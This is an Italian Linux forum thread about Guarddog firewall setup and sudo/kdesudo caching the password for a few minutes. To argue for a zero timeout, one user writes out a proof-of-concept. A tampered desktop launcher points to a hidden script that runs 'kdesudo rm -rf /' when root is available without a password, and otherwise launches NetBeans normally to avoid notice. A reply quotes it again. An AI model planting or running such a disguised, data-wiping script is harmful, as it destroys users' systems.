iptable - guarddog - come si fa a sapere una applicazione che necessita per andare?

[Fil9998]

ho messo sulla kubuintu guarddog

mi dà dei casini orribili con azureus, ktorrent streamripper vlc (strem di canali TV)

un po' l'ho settato con regole personali sulle porte usate da ktorrent e azureus (per altro qusto crasha per i fatti suoi ogni tanto pure afirewall disattivo).

c'è qualche comando... qualcosa che mi dice data una applicazione...

che so??

prendo per esempio streamripper sapere come va configurato guarddog.

(a parte che non ho capito quanto "stable sia" ... a volte mi chiede la password e a volte no, come altre cose su ubutu, tipo il gestore dischi... mhà ... mi pare una gestione un po' traballina questa di sudo).

[Dcromato]

Io ho fatto una cosa:
Mi sono preso l'rc.firewall di una distro che mi faceva funzionare sia rete che firewall con guarddog e me lo sono tenuto per altre distro
Magari non è la cosa migliore ma non sapendone nulla....

Quote:

Originariamente inviato da Fil9998

(a parte che non ho capito quanto "stable sia" ... a volte mi chiede la password e a volte no, come altre cose su ubutu, tipo il gestore dischi... mhà ... mi pare una gestione un po' traballina questa di sudo).

Per nulla...la password non te la chiede certe volte perchè kdesu in lubuntu non cìè a favore di kdesudo e quest'ultimo la tiene a mente per qualche minuto prima che te la richieda.

[Fil9998]

"per qualche minuto" si tiene a mente la password ??



ORRIBILE!!!

sono sempre più orrorificato di questa gestione del lavoro comunemente fatta da root in tutte le altre distro.

(ah, non per spalare m..a .. ma la gestione dischi è quantomeno traballante ... un avvio su quattro monta cdrom e partizioni ntfs alla cazzo e ogni volta in modo diverso ... l'hd esterno usb in NTFS poi è una saga ogni volta farglielo montare e rendere scrivibile da utente... diciamo che l'obbiettivo della facilità è decisamente saltato)



comunque grazie.

[Dcromato]

Quote:

Originariamente inviato da Fil9998

"per qualche minuto" si tiene a mente la password ??



ORRIBILE!!!

sono sempre più orrorificato di questa gestione del lavoro comunemente fatta da root in tutte le altre distro.

e quale sarebbe scusa il problema?La paswwd è gestita sempre al solito modo, è solo una funzione in piu a sudo che c'era gia prima in kdesu...inutile pensare a questo quando magari si affida la memoria di certe passwd a firefox....

[Fil9998]

nada nada... dovresti saperlo che non ci penso manco a far gestire password a firefox o come va di moda ora a un password manager che sta su chiavetta USB...

nada!
imho il classico foglietto di carta o la memoria son la cosa migliore ancora,
ci stiamo rincoglionendo ...
10 anni fa sapevo 30 numeri di telefono a memoria, ora manco mi ricordo i cognomi della gente....

può bastare così il degrado.

[arara]

Quote:

Originariamente inviato da Fil9998

c'è qualche comando... qualcosa che mi dice data una applicazione...

che so??

prendo per esempio streamripper sapere come va configurato guarddog.

Di solito è scritto sulla documentazione o su qualche Readme che porte bisogna aprire, se proprio non lo trovo da nessuna parte disabilito il firewall, avvio l'applicazione in questione e faccio una scansione delle porte con nmap per vedere quali si è aperto, dopo riabilito il firewall e gliele apro.

Quote:

Originariamente inviato da Fil9998

"per qualche minuto" si tiene a mente la password ??



ORRIBILE!!!

sono sempre più orrorificato di questa gestione del lavoro comunemente fatta da root in tutte le altre distro.

Neanche a me piace il fatto che si ricordi la password di root per qualche minuto, se proprio devo usare sudo mi metto il timestamp a zero cosi se la dimentica subito.

Perche cosi come da i previlegi a me, li da anche a qualsiasi altro malware.

Supponi che sfruttando un bug di un'applicazione un malintenzionato riesca ad avere la possibilità di scrivere file nella mia /home (c'era un bug in openofffice qualche mese fa che permetteva di farlo, poi è stato corretto... giusto per dire che puo succedere benissimo), e mi sostituisce qualche link, ad esempio l'icona "Home" sul Desktop, a uno script che prima esegue il codice qua sotto e poi lancia il link originario, cosi non mi accorgo di niente:

if (( `kdesudo -c "id -u"` == 0 ))
then kdesudo rm -rf /

ogni volta che clicco sull'icona come utente normale non fa niente e mi lancia il solito link.

Se pero eseguo kdesudo e metto la password di root per fare qualcosa e poi durante il periodo in cui se la ricorda clicco sul'icona truccata, invece di aprire il link esegue l'if e mi fa un bel rm -rf /...

(ho spiegato di fretta, spero che si capisca l'idea)

Non è sudo in particolare il problema, ma tutti quegli strumenti che danno a un utente normale la possibilità per un certo periodo di tempo di diventare root senza autentificarsi.

edit:
per esempio, sul desktop ho questa icona di avvio:

Quote:

[Desktop Entry]
Exec="/usr/bin/netbeans"
Terminal=0
Type=Application
Icon=/usr/share/icons/netbeans-5.5.1/nb5.5/netbeans.png

il codice malevolo lo modifica con questo:

Quote:

[Desktop Entry]
Exec="/home/utente/.log"
Terminal=0
Type=Application
Icon=/usr/share/icons/netbeans-5.5.1/nb5.5/netbeans.png

e su /home/utente/.log ci mette quello che ho scritto sopra:

Quote:

#!/bin/bash
if (( `kdesudo -c "id -u"` == 0 ))
then
...codice malevolo, tipo
kdesudo rm -rf /
else
exec /usr/bin/netbeans
fi

Cosi io sul mio desktop vedo sempre la solita icona di NetBeans, pero se ci clicco sopra, prima di avviare NetBeans esegue lo script che controlla i miei previlegi: se sono utente normale avvia il programma normalmente e non fa niente, cosi non mi accorgo della modifica e lui resta la.

Quella volta che clicco sull'icona subito dopo aver eseguito kdesudo... vede che che puo diventare root senza autentificarsi e mi esegue il codice malevolo.

[Dcromato]

Quote:

Originariamente inviato da arara

Neanche a me piace il fatto che si ricordi la password di root per qualche minuto, se proprio devo usare sudo mi metto il timestamp a zero cosi se la dimentica subito.

Perche cosi come da i previlegi a me, li da anche a qualsiasi altro malware.

Supponi che sfruttando un bug di un'applicazione un malintenzionato riesca ad avere la possibilità di scrivere file nella mia /home (c'era un bug in openofffice qualche mese fa che permetteva di farlo, poi è stato corretto... giusto per dire che puo succedere benissimo), e mi sostituisce qualche link, ad esempio l'icona "Home" sul Desktop, a uno script che prima esegue il codice qua sotto e poi lancia il link originario, cosi non mi accorgo di niente:

if (( `kdesudo -c "id -u"` == 0 ))
then kdesudo rm -rf /

ogni volta che clicco sull'icona come utente normale non fa niente e mi lancia il solito link.

Se pero eseguo kdesudo e metto la password di root per fare qualcosa e poi durante il periodo in cui se la ricorda clicco sul'icona truccata, invece di aprire il link esegue l'if e mi fa un bel rm -rf /...

(ho spiegato di fretta, spero che si capisca l'idea)

Non è sudo in particolare il problema, ma tutti quegli strumenti che danno a un utente normale la possibilità per un certo periodo di tempo di diventare root senza autentificarsi.

edit:
per esempio, sul desktop ho questa icona di avvio:



il codice malevolo lo modifica con questo:



e su /home/utente/.log ci mette quello che ho scritto sopra:



Cosi io sul mio desktop vedo sempre la solita icona di NetBeans, pero se ci clicco sopra, prima di avviare NetBeans esegue lo script che controlla i miei previlegi: se sono utente normale avvia il programma normalmente e non fa niente, cosi non mi accorgo della modifica e lui resta la.

Quella volta che clicco sull'icona subito dopo aver eseguito kdesudo... vede che che puo diventare root senza autentificarsi e mi esegue il codice malevolo.

Non si puo non è cosi semplice la storia

[mykol]

mi togliete una curiosità ? Ma se siete consapevoli di tutti questi "orrori" perchè usate ubuntu ? Vi considero utenti "evoluti" e sinceramente non capisco questa scelta. Vada per i newby, ma voi cosa vi attira (imprecate ma .... resistete) ... Sopratutto tu, Fil9998 ?

[Fil9998]

oh... in teoria è "pappapronta" ... ho propensione allo sbattimento pari a zero ...
è la prima release di una *buntu che riesco a metter su che non crasha o salta come una beta.
ha sta gesstione "sudo che proprio non capisco secondo che teoria serve a facilitare le cose" e soprattutto
i punti di mount delle varie partizioni random saltano, cambiano permessi, si autoconfigurano su device diversi... maco windows riesce a far tanto. A 'sto punto preferisco editarmi a mano fstab come ho sempre fatto.
E' un peccato perchè nel complesso è una ottima distro ora che han sistemato i crash delle precedenti release
(almeno, sui miei pc sochet amd 939).




è una 64 bit che ha un enorme repository e che fa funzionare al volo wine, flash e menate varie a 32 bit.

fino a poco tempo fa stavo su fedora 64 (abbandonata per repository miserrimi) o su sabayon 64 (compilare alla fine logora, come il potere)
suse 64 (come ogni nuova release è buggata e verrà sistemata in qualche mese... si attende)
frugalware 64 (ottima, ma repository vuoti secondo i miei parametri)

mi restano mandriva 64 di quelli "pappapronta"

oppure mi metterò l'animo in pace per le varie personalizzazioni e sbattimenti a personalizzare e rimetterò su una bella debian 64 che ormai a far girar le apps a 32 mi si dice non ha poblemi.
solo che debian non appena introduci dei repos "test" rischi che esploda ... almeno "buntu" è tutta in test (rispetto a Etch).

c'è poco da fare: debian e figli han repos sconfinati e manuali reperibili ogni dove... questo fa MOLTA differenza.
*bunto giù bella e pronta era un comodità... ma se continua così i vantaggi si perdono e debian diventa più appetibile.

[mpec82]

Codice:

sudo visudo

e poi alla fine di una riga con scritto ALL fqdn e robe simili aggiungi questo

Codice:

,timestamp_timeout=0

in questo modo la password ti verrà richiesta sempre

[Fil9998]

ti adoro!

[Dcromato]

Oppure

Codice:

apt-get --purge remove kdesudo